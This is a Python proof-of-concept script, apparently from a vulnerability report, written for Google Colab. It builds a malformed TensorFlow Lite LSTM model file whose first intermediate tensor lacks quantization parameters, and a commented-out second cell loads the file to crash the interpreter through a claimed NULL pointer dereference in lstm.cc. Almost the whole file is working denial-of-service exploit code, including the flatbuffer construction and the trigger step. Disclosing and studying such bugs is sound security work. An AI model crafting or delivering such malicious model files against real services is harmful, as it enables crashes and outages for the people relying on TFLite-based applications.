# Source: tensorflownullpointer / colab_poc.py
# Uploaded by Breakingbad6 -- commit befad9a ("Upload 4 files", verified)
#!/usr/bin/env python3
"""
Self-contained PoC for Google Colab.

TFLite LSTM NULL pointer dereference DoS.
Bug: PopulateQuantizedLstmParams8x8_8() in lstm.cc reads the intermediate
tensor's quantization.params without a null check.

Usage (two separate Colab cells):
  Cell 1: everything from the top of this file through the "CELL 1" section.
          It installs flatbuffers, builds the model, writes it to /tmp and,
          on Colab, downloads a copy.
  Cell 2: the commented-out "CELL 2" section at the end of this file,
          uncommented and pasted into its own cell. It loads the model and
          calls allocate_tensors(), which is expected to crash the kernel.
"""
# Step 1: Install flatbuffers (Colab has tensorflow pre-installed)
import subprocess
import sys

# Install into the interpreter that is running this script (the notebook
# kernel); check_call raises CalledProcessError if pip fails.
subprocess.check_call([sys.executable, "-m", "pip", "install", "-q", "flatbuffers"])
# Step 2: Build the malicious model
import flatbuffers, os, tempfile
# Raw enum values written into the TFLite flatbuffer by build_poc_model().
# NOTE(review): these mirror enums in TFLite's schema.fbs; confirm against
# the schema version being targeted.

# Written into the Model table's version slot.
TFLITE_SCHEMA_VERSION = 3

# TensorType members used by the model's tensors.
TENSOR_TYPE_INT32, TENSOR_TYPE_INT16, TENSOR_TYPE_INT8 = 2, 7, 9

# BuiltinOperator code for LSTM, and the BuiltinOptions union tag that
# selects LSTMOptions.
BUILTIN_OP_LSTM, BUILTIN_OPTIONS_LSTM = 16, 14
def build_poc_model():
    """Serialise a one-LSTM TFLite model whose first intermediate has no quantization.

    The model is built directly with the low-level ``flatbuffers.Builder`` API
    (no generated schema classes). It has one subgraph containing one LSTM
    operator with:

    * int8 input, input/recurrent weights, and output tensors;
    * int32 gate biases (no quantization);
    * a variable int8 ``output_state`` and a variable int16 ``cell_state``;
    * 12 int16 intermediate tensors.

    Every quantized tensor gets a one-element scale / zero-point table, except
    ``intermediate_0``, which is written with no quantization table at all.
    That missing table is what PopulateQuantizedLstmParams8x8_8() is expected
    to dereference.

    Returns:
        bytes: the finished flatbuffer, using ``b"TFL3"`` as file identifier.

    NOTE(review): all table slot indices below are hard-coded and assumed to
    follow the field order in TFLite's schema.fbs; re-check them if the schema
    changes. Flatbuffers are built back to front, and every string or vector
    is created before the StartObject() of the table that references it. The
    statement order therefore matters and fixes the exact output bytes.
    """
    # Toy LSTM dimensions; every tensor shape below is derived from these.
    n_batch, n_input, n_cell, n_output = 1, 2, 2, 2
    # 8192 is only the builder's initial buffer size.
    b = flatbuffers.Builder(8192)
    # Strings
    # All strings are serialised up front, before any table is opened.
    s_main = b.CreateString("main")
    # Short key -> string offset. The intermediates are keyed "inter_<i>",
    # but their serialised tensor names are "intermediate_<i>".
    names = {}
    for n in ["input","i2f_w","i2c_w","i2o_w","r2f_w","r2c_w","r2o_w",
              "fg_bias","cg_bias","og_bias","output_state","cell_state","output"]:
        names[n] = b.CreateString(n)
    for i in range(12):
        names[f"inter_{i}"] = b.CreateString(f"intermediate_{i}")

    # Vector helpers. Each one writes a single vector into ``b`` and returns
    # its offset. Elements are prepended in reverse so they read back in order.
    def make_int_vec(vals):
        # int32 elements, 4-byte aligned.
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals): b.PrependInt32(v)
        return b.EndVector()
    def make_float_vec(vals):
        # float32 elements, 4-byte aligned.
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals): b.PrependFloat32(v)
        return b.EndVector()
    def make_int64_vec(vals):
        # int64 elements, 8-byte aligned.
        b.StartVector(8, len(vals), 8)
        for v in reversed(vals): b.PrependInt64(v)
        return b.EndVector()
    def make_bool_vec(vals):
        # One byte per bool.
        b.StartVector(1, len(vals), 1)
        for v in reversed(vals): b.PrependBool(v)
        return b.EndVector()
    def make_quant(scale_val, zp_val=0):
        # Per-tensor quantization table with one scale and one zero point.
        # NOTE(review): assumes QuantizationParameters has 7 fields, with
        # scale at slot 2 and zero_point at slot 3.
        sv = make_float_vec([scale_val])
        zv = make_int64_vec([zp_val])
        b.StartObject(7)
        b.PrependUOffsetTRelativeSlot(2, sv, 0)
        b.PrependUOffsetTRelativeSlot(3, zv, 0)
        return b.EndObject()
    def make_tensor(name_off, shape_off, ttype, buf_idx, quant_off=0, is_var=False):
        # Tensor table. NOTE(review): assumed slot layout is 0 shape, 1 type,
        # 2 buffer, 3 name, 4 quantization, 5 is_variable.
        # quant_off == 0 acts as the "no quantization" sentinel. Slot 4 is then
        # omitted entirely, which is how intermediate_0 below ends up with no
        # quantization table.
        b.StartObject(10)
        b.PrependUOffsetTRelativeSlot(0, shape_off, 0)
        b.PrependByteSlot(1, ttype, 0)
        b.PrependUint32Slot(2, buf_idx, 0)
        b.PrependUOffsetTRelativeSlot(3, name_off, 0)
        if quant_off: b.PrependUOffsetTRelativeSlot(4, quant_off, 0)
        if is_var: b.PrependBoolSlot(5, True, False)
        return b.EndObject()

    # Shapes (int32 vectors). sh_it is the 1-element shape shared by all
    # twelve intermediate tensors.
    sh_in = make_int_vec([n_batch, n_input])
    sh_wi = make_int_vec([n_cell, n_input])
    sh_wr = make_int_vec([n_cell, n_output])
    sh_b = make_int_vec([n_cell])
    sh_os = make_int_vec([n_batch, n_output])
    sh_cs = make_int_vec([n_batch, n_cell])
    sh_out= make_int_vec([n_batch, n_output])
    sh_it = make_int_vec([1])

    # Quantization. Each call creates a separate table that tensors reference
    # by offset. q_cs has scale 1/32768 (2**-15); all zero points are 0.
    q_in = make_quant(0.1)
    q_w = make_quant(0.01)
    q_os = make_quant(0.1)
    q_cs = make_quant(1.0/32768)
    q_o = make_quant(0.1)
    q_it = make_quant(0.01)

    # Tensors. The resulting tensor indices, used by op_ins / op_outs /
    # op_inters below, are:
    #   0 input, 1-3 input->gate weights, 4-6 recurrent weights,
    #   7-9 gate biases, 10 output_state, 11 cell_state, 12 output,
    #   13-24 intermediate_0..intermediate_11.
    # Tensor i always uses buffer i + 1; buffer 0 is left as an empty table.
    tensors = []
    tensors.append(make_tensor(names["input"], sh_in, TENSOR_TYPE_INT8, 1, q_in))
    for n in ["i2f_w","i2c_w","i2o_w"]:
        tensors.append(make_tensor(names[n], sh_wi, TENSOR_TYPE_INT8, len(tensors)+1, q_w))
    for n in ["r2f_w","r2c_w","r2o_w"]:
        tensors.append(make_tensor(names[n], sh_wr, TENSOR_TYPE_INT8, len(tensors)+1, q_w))
    for n in ["fg_bias","cg_bias","og_bias"]:
        # Biases are written without a quantization table.
        tensors.append(make_tensor(names[n], sh_b, TENSOR_TYPE_INT32, len(tensors)+1))
    tensors.append(make_tensor(names["output_state"], sh_os, TENSOR_TYPE_INT8, 11, q_os, is_var=True))
    tensors.append(make_tensor(names["cell_state"], sh_cs, TENSOR_TYPE_INT16, 12, q_cs, is_var=True))
    tensors.append(make_tensor(names["output"], sh_out, TENSOR_TYPE_INT8, 13, q_o))
    # 12 intermediates: inter_0 has NO quantization (triggers NULL deref)
    for i in range(12):
        if i == 0:
            tensors.append(make_tensor(names[f"inter_{i}"], sh_it, TENSOR_TYPE_INT16, 14+i))
        else:
            tensors.append(make_tensor(names[f"inter_{i}"], sh_it, TENSOR_TYPE_INT16, 14+i, q_it))
    # Vector of offsets to the 25 Tensor tables, in index order.
    b.StartVector(4, len(tensors), 4)
    for t in reversed(tensors): b.PrependUOffsetTRelative(t)
    tensors_vec = b.EndVector()

    # LSTMOptions
    # NOTE(review): every value below equals its declared default. The
    # flatbuffers builder skips such slots unless forceDefaults is set, so
    # this table is most likely serialised empty.
    b.StartObject(5)
    b.PrependByteSlot(0, 0, 0) # activation=NONE
    b.PrependFloat32Slot(1, 0.0, 0.0) # cell_clip
    b.PrependFloat32Slot(2, 0.0, 0.0) # proj_clip
    b.PrependByteSlot(3, 0, 0) # kernel_type=FULL
    b.PrependBoolSlot(4, False, False)
    lstm_opts = b.EndObject()

    # Operator
    # 24 LSTM input slots; -1 marks an omitted optional input. The populated
    # slots are:
    #   0 -> input, 2-4 -> tensors 1-3, 6-8 -> tensors 4-6,
    #   13-15 -> biases 7-9, 18 -> output_state, 19 -> cell_state.
    op_ins = make_int_vec([0,-1,1,2,3,-1,4,5,6,-1,-1,-1,-1,7,8,9,-1,-1,10,11,-1,-1,-1,-1])
    op_outs = make_int_vec([12])
    # Intermediates are tensors 13..24 (12 entries).
    op_inters = make_int_vec(list(range(13, 25)))
    # Inputs 18 and 19 (the two state tensors) are flagged as mutated.
    mut = [False]*24; mut[18]=True; mut[19]=True
    op_mut = make_bool_vec(mut)
    # Operator table. NOTE(review): assumed slots are 0 opcode_index,
    # 1 inputs, 2 outputs, 3 builtin_options_type, 4 builtin_options,
    # 7 mutating_variable_inputs, 8 intermediates.
    b.StartObject(14)
    b.PrependUint32Slot(0, 0, 0)
    b.PrependUOffsetTRelativeSlot(1, op_ins, 0)
    b.PrependUOffsetTRelativeSlot(2, op_outs, 0)
    b.PrependByteSlot(3, BUILTIN_OPTIONS_LSTM, 0)
    b.PrependUOffsetTRelativeSlot(4, lstm_opts, 0)
    b.PrependUOffsetTRelativeSlot(7, op_mut, 0)
    b.PrependUOffsetTRelativeSlot(8, op_inters, 0)
    operator = b.EndObject()
    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(operator)
    ops_vec = b.EndVector()

    # SubGraph
    # The graph's only input is tensor 0 and its only output is tensor 12.
    sg_in = make_int_vec([0])
    sg_out = make_int_vec([12])
    b.StartObject(5)
    b.PrependUOffsetTRelativeSlot(0, tensors_vec, 0)
    b.PrependUOffsetTRelativeSlot(1, sg_in, 0)
    b.PrependUOffsetTRelativeSlot(2, sg_out, 0)
    b.PrependUOffsetTRelativeSlot(3, ops_vec, 0)
    b.PrependUOffsetTRelativeSlot(4, s_main, 0)
    sg = b.EndObject()
    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(sg)
    sgs_vec = b.EndVector()

    # OperatorCode
    # The LSTM code is written both to slot 0 (byte) and slot 3 (int32).
    # Slot 2 (version) is given 1, which equals its default, so the builder
    # does not actually serialise it.
    b.StartObject(4)
    b.PrependByteSlot(0, BUILTIN_OP_LSTM, 0)
    b.PrependInt32Slot(2, 1, 1)
    b.PrependInt32Slot(3, BUILTIN_OP_LSTM, 0)
    oc = b.EndObject()
    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(oc)
    ocs_vec = b.EndVector()

    # Buffers
    # Buffers 2-7 (tensors 1-6) hold zero-filled weight bytes. Buffers 8-10
    # (tensors 7-9) hold zero-filled bytes sized for n_cell int32 biases.
    # Every other buffer index, including 0, becomes an empty Buffer table.
    weight_data = bytes(n_cell * n_input) # 4 bytes
    bias_data = bytes(n_cell * 4) # 8 bytes
    data_vecs = {}
    for bi in range(2, 8):
        b.StartVector(1, len(weight_data), 1)
        for byte in reversed(weight_data): b.PrependByte(byte)
        data_vecs[bi] = b.EndVector()
    for bi in range(8, 11):
        b.StartVector(1, len(bias_data), 1)
        for byte in reversed(bias_data): b.PrependByte(byte)
        data_vecs[bi] = b.EndVector()
    # 26 buffers: index 0 plus one per tensor (tensor i -> buffer i + 1).
    bufs = []
    for bi in range(26):
        if bi in data_vecs:
            b.StartObject(1)
            b.PrependUOffsetTRelativeSlot(0, data_vecs[bi], 0)
            bufs.append(b.EndObject())
        else:
            b.StartObject(1)
            bufs.append(b.EndObject())
    b.StartVector(4, 26, 4)
    for buf in reversed(bufs): b.PrependUOffsetTRelative(buf)
    bufs_vec = b.EndVector()

    # Model
    # NOTE(review): assumed slots are 0 version, 1 operator_codes,
    # 2 subgraphs, 4 buffers.
    b.StartObject(8)
    b.PrependUint32Slot(0, TFLITE_SCHEMA_VERSION, 0)
    b.PrependUOffsetTRelativeSlot(1, ocs_vec, 0)
    b.PrependUOffsetTRelativeSlot(2, sgs_vec, 0)
    b.PrependUOffsetTRelativeSlot(4, bufs_vec, 0)
    model = b.EndObject()
    # Finish the root table with the "TFL3" file identifier.
    b.Finish(model, b"TFL3")
    return bytes(b.Output())
# ============================================================
# CELL 1: Build model and download it (run this first!)
# ============================================================
model_bytes = build_poc_model()
model_path = "/tmp/poc_lstm_null_deref.tflite"
with open(model_path, "wb") as f:
    f.write(model_bytes)
print(f"[+] Model: {model_path} ({len(model_bytes)} bytes)")
print("[+] 12 intermediates, inter[0] has NO quantization -> NULL deref")
# Download the model file before crashing the kernel: Cell 2 is expected to
# take the kernel down, so grab a copy while this session is still alive.
# Only the import decides "on Colab or not". download() runs in the else
# branch, so an ImportError raised inside it is not misreported as
# "Not on Colab".
try:
    from google.colab import files
except ImportError:
    print("[*] Not on Colab, model saved to:", model_path)
else:
    files.download(model_path)
    print("[+] Model downloaded! Now run Cell 2 to trigger crash.")
# ============================================================
# CELL 2: Trigger the crash (run this AFTER downloading model)
# Put everything below this line in a SEPARATE Colab cell.
# ============================================================
# import tensorflow as tf
# print(f"[*] TensorFlow version: {tf.__version__}")
# print(f"[*] Loading model and calling allocate_tensors()...")
# print(f"[*] Expected: crash in PopulateQuantizedLstmParams8x8_8()")
# try:
# interpreter = tf.lite.Interpreter(model_path="/tmp/poc_lstm_null_deref.tflite")
# interpreter.allocate_tensors()
# print("[!] No crash - bug may be fixed or model didn't hit the right path")
# except Exception as e:
# print(f"[!] Exception (not a crash): {type(e).__name__}: {e}")
# print("[*] If the kernel died/restarted above, NULL deref triggered successfully.")